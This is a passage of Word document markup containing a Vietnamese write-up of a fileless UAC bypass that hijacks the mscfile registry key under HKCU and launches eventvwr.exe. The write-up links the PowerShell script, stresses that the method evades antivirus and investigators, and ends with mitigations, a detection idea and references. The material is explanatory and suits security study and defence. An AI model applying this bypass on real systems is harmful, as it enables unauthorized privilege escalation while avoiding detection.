          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C478CB9" w14:textId="2556F5C4" w:rsidR="0078004F" w:rsidRDefault="0078004F" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141F345A" w14:textId="5994F63F" w:rsidR="0078004F" w:rsidRDefault="0078004F" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tôi </w:t>
      </w:r>
      <w:r w:rsidR="00BA160D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">có thể </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">kiểm soát tiến trình </w:t>
      </w:r>
      <w:r w:rsidR="00BA160D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">được </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>khởi động</w:t>
      </w:r>
      <w:r w:rsidR="00BA160D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nên tôi có thể thực thi bất kì Powershell script nào tôi muốn. Điều này có nghĩa là thực thi code trong 1 tiến trình có tính toàn vẹn cao (bypassing UAC)</w:t>
      </w:r>
      <w:r w:rsidR="00D070C5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> mà</w:t>
      </w:r>
      <w:r w:rsidR="00BA160D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> không có thả DLL hay 1 tệp khác </w:t>
      </w:r>
      <w:r w:rsidR="00BA160D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>vào hệ thống file. Nó giảm rủi ro cho kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidR="00D070C5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, nếu</w:t>
      </w:r>
      <w:r w:rsidR="00BA160D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> họ đặt file gốc vào hệ thống tệp, có thể bị bắt bởi AV/HIPS </w:t>
      </w:r>
      <w:r w:rsidR="00A271FA">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">hoặc các điều tra viên </w:t>
      </w:r>
      <w:r w:rsidR="00BA160D">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sau đó</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B7BAA2" w14:textId="1D7FBA56" w:rsidR="00D070C5" w:rsidRDefault="00D070C5" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="481C34C8" w14:textId="6AC028F8" w:rsidR="00D070C5" w:rsidRDefault="00D070C5" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Để mô phỏng cuộc tấn công, Matt Graeber và tôi đã thực hiện 1 Powershell script, khi thực thi trên hệ thống, sẽ tạo 1 registry trong hive của người dùng hiện tại (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D070C5">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKCU\Software\Classes\mscfile\shell\open\command</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>), bạn có thể truyền vào giá trị mặc định qua tham số -Command, chạy eventvwr.exe, sau đó dọn dẹp registry entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F09AFE" w14:textId="7176E780" w:rsidR="002365B4" w:rsidRDefault="002365B4" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799C028C" w14:textId="5016BD6D" w:rsidR="002365B4" w:rsidRDefault="002365B4" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Bạn có thể tìm script ở đây: </w:t>
      </w:r>
      <w:r w:rsidRPr="002365B4">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136DCBB4" w14:textId="762C6857" w:rsidR="0023709C" w:rsidRDefault="0023709C" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30658EE4" w14:textId="77777777" w:rsidR="004A4DB9" w:rsidRDefault="0023709C" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Trong script, chúng tôi đã cung cấp 1 lệnh ví dụ. Lệnh này dùng Powershell để ghi </w:t>
      </w:r>
      <w:r w:rsidRPr="0023709C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">“Is Elevated: True” </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> vào </w:t>
      </w:r>
      <w:r w:rsidRPr="0023709C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>C:\UACBypassTest</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00440F1B">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Điều này mô phỏng lệnh đã thực thi trong 1 tiến trình có tính toàn vẹn cao vì “Is Elevated” bằng True và tệp văn bản được ghi vào 1 thư mục mà 1 tiến trình có tính toàn vẹn trung sẽ không được phép ghi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DE1E5C" w14:textId="77777777" w:rsidR="004A4DB9" w:rsidRDefault="004A4DB9" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20ABDB67" w14:textId="1C551D84" w:rsidR="0023709C" w:rsidRDefault="004A4DB9" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kĩ thuật này khác với các kĩ thuật đã được public trước đó, có 1 số lợi ích:</w:t>
      </w:r>
      <w:r w:rsidR="0023709C">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043FD568" w14:textId="64FAFF4F" w:rsidR="004A4DB9" w:rsidRPr="00F06B85" w:rsidRDefault="004A4DB9" w:rsidP="00F06B85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F06B85">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Không  thả tệp vào hệ thống file</w:t>
      </w:r>
      <w:r w:rsidR="00F06B85" w:rsidRPr="00F06B85">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, giảm </w:t>
      </w:r>
      <w:r w:rsidRPr="00F06B85">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">khả năng kẻ tấn công bị bắt. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F5E45B" w14:textId="2F2BAEAD" w:rsidR="004A4DB9" w:rsidRPr="00F06B85" w:rsidRDefault="004A4DB9" w:rsidP="00F06B85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F06B85">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Không  tiêm vào bất kỳ tiến trình nào, </w:t>
      </w:r>
      <w:r w:rsidR="00F06B85" w:rsidRPr="00F06B85">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kẻ tấn công không bị đánh dấu bởi các giải pháp bảo mật đang theo dõi hành vi này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25469A7F" w14:textId="06F45F9D" w:rsidR="00F06B85" w:rsidRDefault="00F06B85" w:rsidP="00F06B85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F06B85">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Không yêu cầu đặc quyền sao chép tệp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6804C0F5" w14:textId="250D8C9C" w:rsidR="00915E97" w:rsidRDefault="00915E97" w:rsidP="00915E97">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13D804D5" w14:textId="010A63A1" w:rsidR="00915E97" w:rsidRPr="00915E97" w:rsidRDefault="00915E97" w:rsidP="00915E97">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Có thể ngăn chặn kĩ thuật này bằng cách đặt mức độ UAC là “Always Notify” hoặc xóa người dùng hiện tại khỏi nhóm Local Administrators. </w:t>
      </w:r>
      <w:r w:rsidR="00330318">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Nếu </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bạn muốn theo dõi tấn công này, bạn có thể khởi tạo</w:t>
      </w:r>
      <w:r w:rsidR="00330318">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods/signatures để tìm kiếm và cảnh báo trên các điểm vào registry mới trong HKCU\Software\Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5DCB3F" w14:textId="77777777" w:rsidR="002365B4" w:rsidRPr="002365B4" w:rsidRDefault="002365B4" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35F6E529" w14:textId="77777777" w:rsidR="00546824" w:rsidRDefault="00546824" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E00D8DE" w14:textId="6BA6ED99" w:rsidR="00546824" w:rsidRPr="00DC15FB" w:rsidRDefault="00DC15FB" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC15FB">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Tham khảo: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DF5EA3C" w14:textId="409E0A24" w:rsidR="00DC15FB" w:rsidRPr="00DC15FB" w:rsidRDefault="00DC15FB" w:rsidP="00DC15FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC15FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD52860" w14:textId="04AA927D" w:rsidR="00DC15FB" w:rsidRPr="00DC15FB" w:rsidRDefault="00DC15FB" w:rsidP="00DC15FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC15FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EC2725F" w14:textId="18B13AC7" w:rsidR="00DC15FB" w:rsidRPr="00DC15FB" w:rsidRDefault="00DC15FB" w:rsidP="00DC15FB">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC15FB">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://github.com/k4sth4/UAC-bypass</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="615742B4" w14:textId="77777777" w:rsidR="00DC15FB" w:rsidRPr="00FE428B" w:rsidRDefault="00DC15FB" w:rsidP="00E67E65">
      <w:pPr>
        <w:ind w:right="4"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00DC15FB" w:rsidRPr="00FE428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46806"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E6AE6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0E668E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0409001D"/>
    <w:styleLink w:val="Style1"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="360" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"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62274C7A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="53148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39ED"/>
    <w:rsid w:val="000F16D7"/>
    <w:rsid w:val="000F6934"/>
    <w:rsid w:val="0012132C"/>
    <w:rsid w:val="001406E7"/>
    <w:rsid w:val="001B262D"/>
    <w:rsid w:val="002365B4"/>
    <w:rsid w:val="0023709C"/>
    <w:rsid w:val="00241600"/>
    <w:rsid w:val="00253F9D"/>
    <w:rsid w:val="00264DD9"/>
    <w:rsid w:val="002C4FF0"/>
    <w:rsid w:val="002F3A8A"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="003042B3"/>
    <w:rsid w:val="00325B67"/>
    <w:rsid w:val="00330318"/>
    <w:rsid w:val="00345859"/>
    <w:rsid w:val="00440F1B"/>
    <w:rsid w:val="0044333F"/>
    <w:rsid w:val="004756FA"/>
    <w:rsid w:val="004A4DB9"/>
    <w:rsid w:val="004D454F"/>
    <w:rsid w:val="004E1A1E"/>
    <w:rsid w:val="00527735"/>
    <w:rsid w:val="00546824"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="005D7186"/>
    <w:rsid w:val="005E6EC9"/>
    <w:rsid w:val="00606FB6"/>
    <w:rsid w:val="006228CC"/>
    <w:rsid w:val="006515D9"/>
    <w:rsid w:val="00674F73"/>
    <w:rsid w:val="00697A4C"/>
    <w:rsid w:val="006A50AC"/>
    <w:rsid w:val="007039ED"/>
    <w:rsid w:val="0078004F"/>
    <w:rsid w:val="00814345"/>
    <w:rsid w:val="00823798"/>
    <w:rsid w:val="00832616"/>
    <w:rsid w:val="00846046"/>
    <w:rsid w:val="00847445"/>
    <w:rsid w:val="008D7872"/>
    <w:rsid w:val="00915E97"/>
    <w:rsid w:val="00994509"/>
    <w:rsid w:val="0099621C"/>
    <w:rsid w:val="00A04314"/>
    <w:rsid w:val="00A271FA"/>
    <w:rsid w:val="00A53F33"/>
    <w:rsid w:val="00A6733D"/>
    <w:rsid w:val="00AC504B"/>
    <w:rsid w:val="00B675B9"/>
    <w:rsid w:val="00B7247D"/>
    <w:rsid w:val="00B7682E"/>
    <w:rsid w:val="00BA160D"/>
    <w:rsid w:val="00BB7E23"/>
    <w:rsid w:val="00BC519B"/>
    <w:rsid w:val="00BC5F95"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BF77BA"/>
    <w:rsid w:val="00C36BB0"/>
    <w:rsid w:val="00C611E9"/>
    <w:rsid w:val="00C86D7C"/>
    <w:rsid w:val="00CB395F"/>
    <w:rsid w:val="00CC724A"/>
    <w:rsid w:val="00CF6D39"/>
    <w:rsid w:val="00D070C5"/>
    <w:rsid w:val="00D0767D"/>
    <w:rsid w:val="00D42382"/>
    <w:rsid w:val="00D6107F"/>
    <w:rsid w:val="00DC15FB"/>
    <w:rsid w:val="00E46B52"/>
    <w:rsid w:val="00E67E65"/>
    <w:rsid w:val="00EC6679"/>
    <w:rsid w:val="00EF3D7B"/>
    <w:rsid w:val="00EF57EB"/>
    <w:rsid w:val="00F06B85"/>
    <w:rsid w:val="00F46F3C"/>
    <w:rsid w:val="00F62953"/>
    <w:rsid w:val="00F757DF"/>
    <w:rsid w:val="00F76E6D"/>
    <w:rsid w:val="00FE428B"/>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4649BBC4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{62E5CD26-7364-8844-873F-52CCB9D78A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BD107F"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="1"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00F06B8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157</TotalTime>
  <Pages>15</Pages>
  <Words>1594</Words>
  <Characters>9091</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54</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-21T14:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-02-09T06:50:00Z</dcterms:modified>
</cp:coreProperties>
</file>